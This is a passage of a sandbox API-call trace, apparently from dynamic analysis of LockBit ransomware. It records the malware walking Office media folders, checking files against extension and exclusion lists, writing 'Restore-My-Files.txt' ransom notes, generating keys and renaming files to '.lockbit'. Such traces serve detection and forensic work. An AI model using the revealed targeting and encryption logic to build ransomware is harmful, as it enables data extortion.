pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10263_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0202.942] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0202.942] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.943] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe10b8b00, ftCreationTime.dwHighDateTime=0x1bd8f8e, ftLastAccessTime.dwLowDateTime=0xbc86dac0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe10b8b00, ftLastWriteTime.dwHighDateTime=0x1bd8f8e, nFileSizeHigh=0x0, nFileSizeLow=0xb9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10264_.GIF", cAlternateFileName="")) returned 1 [0202.943] lstrcmpiW (lpString1=".", lpString2="BD10264_.GIF") returned -1 [0202.943] lstrcmpiW (lpString1="..", lpString2="BD10264_.GIF") returned -1 [0202.943] PathFindExtensionW (pszPath="BD10264_.GIF") returned=".GIF" [0202.943] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0202.943] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0202.943] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0202.943] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0202.943] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0202.943] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0202.943] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0202.943] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0202.943] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0202.943] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0202.943] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0202.943] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0202.943] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0202.943] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0202.943] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0202.943] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0202.943] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0202.943] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0202.943] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0202.943] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0202.943] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0202.943] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0202.943] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0202.943] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0202.943] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.943] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0202.943] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0202.944] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0202.944] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0202.944] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0202.944] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10264_.GIF") returned 1 [0202.944] lstrcmpiW (lpString1="ntldr", lpString2="BD10264_.GIF") returned 1 [0202.944] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10264_.GIF") returned 1 [0202.944] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10264_.GIF") returned 1 [0202.944] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10264_.GIF") returned -1 [0202.944] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10264_.GIF") returned 1 [0202.944] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10264_.GIF") returned 1 [0202.944] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0202.944] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10264_.GIF") returned=".GIF" [0202.944] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0202.945] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0202.945] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0202.945] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0202.945] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0202.945] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0202.945] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0202.945] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0202.945] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0202.945] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0202.945] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0202.945] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0202.945] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0202.945] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0202.945] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0202.945] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0202.945] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0202.945] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0202.945] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0202.945] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0202.945] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0202.945] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0202.945] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0202.945] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0202.945] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0202.945] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0202.945] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0202.945] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0202.945] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10264_.GIF.lockbit") returned 78 [0202.946] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10264_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10264_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.947] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.947] malloc (_Size=0x40068) returned 0x3df0008 [0202.947] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=185) returned 1 [0202.947] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.948] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.948] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.952] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10264_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10264_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.952] malloc (_Size=0xb2) returned 0x1fa2ed8 [0202.952] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0202.952] free (_Block=0x1fa2ed8) [0202.952] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10264_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0202.952] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0202.952] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.952] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe10b8b00, ftCreationTime.dwHighDateTime=0x1bd8f8e, ftLastAccessTime.dwLowDateTime=0xbc86dac0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe10b8b00, ftLastWriteTime.dwHighDateTime=0x1bd8f8e, nFileSizeHigh=0x0, nFileSizeLow=0x134, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10265_.GIF", cAlternateFileName="")) returned 1 [0202.952] lstrcmpiW (lpString1=".", lpString2="BD10265_.GIF") returned -1 [0202.952] lstrcmpiW (lpString1="..", lpString2="BD10265_.GIF") returned -1 [0202.952] PathFindExtensionW (pszPath="BD10265_.GIF") returned=".GIF" [0202.953] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0202.953] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0202.953] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0202.953] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0202.953] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0202.953] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0202.953] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0202.953] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0202.953] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0202.953] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0202.953] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0202.953] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0202.953] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0202.953] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0202.953] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0202.953] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0202.953] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0202.953] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0202.953] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0202.953] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0202.953] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0202.953] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0202.953] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0202.953] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0202.953] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.953] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0202.953] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0202.953] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0202.953] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0202.953] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0202.954] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10265_.GIF") returned 1 [0202.954] lstrcmpiW (lpString1="ntldr", lpString2="BD10265_.GIF") returned 1 [0202.954] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10265_.GIF") returned 1 [0202.954] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10265_.GIF") returned 1 [0202.954] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10265_.GIF") returned -1 [0202.954] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10265_.GIF") returned 1 [0202.954] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10265_.GIF") returned 1 [0202.954] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0202.954] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10265_.GIF") returned=".GIF" [0202.954] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0202.954] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0202.955] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0202.955] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0202.955] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0202.955] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0202.955] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0202.955] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0202.955] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0202.955] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0202.955] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0202.955] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0202.955] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0202.955] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0202.955] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0202.955] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0202.955] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0202.955] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0202.955] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0202.955] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0202.955] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0202.955] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0202.955] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0202.955] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0202.955] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0202.955] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0202.955] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0202.955] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10265_.GIF.lockbit") returned 78 [0202.955] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10265_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10265_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.957] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.957] malloc (_Size=0x40068) returned 0x3df0008 [0202.958] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=308) returned 1 [0202.958] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.958] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.958] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.958] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.958] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.962] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10265_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10265_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.962] malloc (_Size=0xb2) returned 0x1fa2ed8 [0202.962] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0202.962] free (_Block=0x1fa2ed8) [0202.962] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10265_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0202.962] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0202.962] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.962] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe23cb800, ftCreationTime.dwHighDateTime=0x1bd8f8e, ftLastAccessTime.dwLowDateTime=0xbc86dac0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe23cb800, ftLastWriteTime.dwHighDateTime=0x1bd8f8e, nFileSizeHigh=0x0, nFileSizeLow=0xb1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10266_.GIF", cAlternateFileName="")) returned 1 [0202.962] lstrcmpiW (lpString1=".", lpString2="BD10266_.GIF") returned -1 [0202.962] lstrcmpiW (lpString1="..", lpString2="BD10266_.GIF") returned -1 [0202.962] PathFindExtensionW (pszPath="BD10266_.GIF") returned=".GIF" [0202.962] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0202.962] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0202.962] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0202.962] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0202.962] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0202.962] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0202.962] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0202.962] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0202.963] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0202.963] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0202.963] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0202.963] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0202.963] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0202.963] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0202.963] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0202.963] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0202.963] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0202.963] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0202.964] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0202.964] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.964] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0202.964] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0202.964] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0202.964] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0202.964] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10266_.GIF") returned 1 [0202.964] lstrcmpiW (lpString1="ntldr", lpString2="BD10266_.GIF") returned 1 [0202.964] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10266_.GIF") returned 1 [0202.964] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10266_.GIF") returned 1 [0202.964] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10266_.GIF") returned -1 [0202.964] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10266_.GIF") returned 1 [0202.964] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10266_.GIF") returned 1 [0202.964] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0202.964] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10266_.GIF") returned=".GIF" [0202.964] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0202.964] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0202.964] lstrcmpiW 